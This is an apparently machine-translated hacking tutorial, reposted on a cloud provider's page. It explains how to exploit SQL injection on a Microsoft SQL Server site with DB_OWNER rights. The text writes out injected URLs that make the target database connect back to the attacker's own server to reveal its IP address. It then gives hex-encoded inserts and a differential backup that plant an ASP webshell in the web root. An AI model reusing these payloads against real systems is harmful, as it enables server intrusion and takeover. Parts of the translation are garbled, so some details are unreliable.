DB_OWNER permission to obtain the IP address of the mssql Server

Source: Internet
Author: User
Tags mssql server

Purreth hacksb.cn

DB_OWNER permission to obtain the mssql Server IP address is now injected with a lot of tools, and the past era of manual injection no longer exists.
Instead of nbsi hdsi ah d injection tools... etc. It is also the favorite of many cainiao.
Even if you don't know anything, you just need a few mouse clicks. The website password with the injection vulnerability will be displayed.
The next step is to scan the background and upload the trojan files. This is simple. If you encounter the SA permission, you can directly set up the code 3389 or upload the WEBSHELL.
It is ing over the Intranet. If it is the DB_OWNER permission, we should consider using backup differences. But what should we do if the WEB and database are not on the same server?
In fact, it may not be certain. In addition to writing the DOS command to the Registry to enable the command to be run on the target server, it is also limited.
This user must be authorized to the Master database before the stored procedure can be called. Few administrators will do this, so the hope is very small.
What should we do if this happens? See Figure 1

DB permission. Check whether the data is in the same directory as the WEB. If the data is in the same directory, consider the backup difference.
However, unfortunately, no WEB directory is found. 2

This is the reading path using MSSQL's XP_dirtree storage process. Then write the result to the temporary table. Previously, NBSI did not have this function.
We had to scan the SA for the food. We had to get the background and the like. Later, NBSI added the treelist function.
You can list directories to view the directory structure, software information, and so on.
Later, Getwebshell was developed to make the function shine for life, plug the horse into the database, and then back up the database as an ASP file.
The row is feasible. But if the database is too large, can you use dozens of MB webshells? The backup difference between Xiaolu is not bad.
Reduce the file size and perform differential backup. However, back to the original point. The data is not in the same area as the WEB.
In fact, even if the database and WEB are not in the same place, there is still a chance. It doesn't mean that there is no chance. Generally, the server installs the system.
Will all install IIS? List his drive C. Check if there is any Inetpub directory. Then you will know if he has installed IIS. But if you do not know his IP address, too? What should we do?
In this case, PING the WEB server and scan port 1433 in section C to see which server is enabled. However, this method is not good. Now many hosts have enabled the firewall.
Even if port 1433 is enabled, you cannot scan it. What should I do? You can use the opendatasource macro to establish a connection between the other SQL statement and your own database.
Now that you can establish a connection, you can get the IP address of the database server. Let's try it. There are several prerequisites for this.
First, your machine must have a public IP address and open port 1433 must be accessible from the Internet.
I am currently working on this site. 100% the data is not in the same area as the WEB. But I saw the Inetpub folder from disk C. It indicates that the database server has IIS installed, but cannot get its IP address.
How to do it? Simple. Use the method mentioned above. First, create a database on the local machine. First, open the query analyzer input.
Create database hack520 Create TABLE zhu (name nvarchar (256) null); Create TABLE J8 (id int NULL, name nvarchar (256) null );
Click execute. Figure 3

A hack520 Database name and zhu J8 table are created. zhu contains the name field. J8 also has two field names.
One is id and the other is name. Now we can start to establish a connection.
First look at this SQL statement insert into opendatasource (sqloledb, server = your IP address; uid = SQL user; pwd = SQL password; database = created database name ). database Name. statement executed by table name
Let's start now ....
Asp? Id = 126 insert % 20 into % 20 opendatasource (sqloledb, server "> http://www.xxx.com/news.asp? Id = 126 insert % 20 into % 20 opendatasource (sqloledb, server =
219.149.xx.182; uid = sa; pwd = hack520! #77169; database = hack520 ).
Hack5mongodbo. zhu % 20 select % 20 name % 20 from % 20master. dbo. sysdatabases --
Execute it on IE. At this time, the other party will connect to the SQL server on my machine. Do not believe it? Netstat-~ Figure 4

Haha has been connected. Now the IP address of the database server knows, and the database server has opened 80 again. What are you doing now?
Bak A webshell. We know the WEB directory C: Inetpubwwwroot. Good. Start.
Http://www.xxx.com/news.asp? Id = 126; use tg800; declare @ a sysname, @ s varchar (4000)
Select @ a = db_name (), @ s = 0x737339323238 backup database @ a to disk = @ s -- backup the current database
Http://www.xxx.com/news.asp? Id = 126; Drop table [hack520]; create table [dbo]. [hack520] ([cmd] [image]) --
Http://www.xxx.com/news.asp? Id = 126; insert into hack520 (cmd)
Values (0x3c2565786563757450201095717565737428226c2229253e) -- insert a blue-screen Trojan
Http://www.xxx.com/news.asp? Id = 126; declare @ a sysname, @ s varchar (4000)
Select @ a = db_name (), @ s = 0x433a5c496e65747075625c777777109f6f745c7a68752e617370
Backup database @ a to disk = @ s with differential, FORMAT -- get WEBSHELL http://221.216xxx.xx/zhu.asp again with differential backup
Next we will use the blue-screen Trojan client to connect. This is simple. I will not talk about it here.
Although the WEB Server SHELL is not obtained, at least it is not empty-handed. The database server SHELL is obtained.
The above ideas are good. I hope you can win them when you encounter similar situations, but this still has some limitations.
The key lies in the SQL reverse connection. If the other party has a firewall or TCP/IP screening, it is not so optimistic.


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.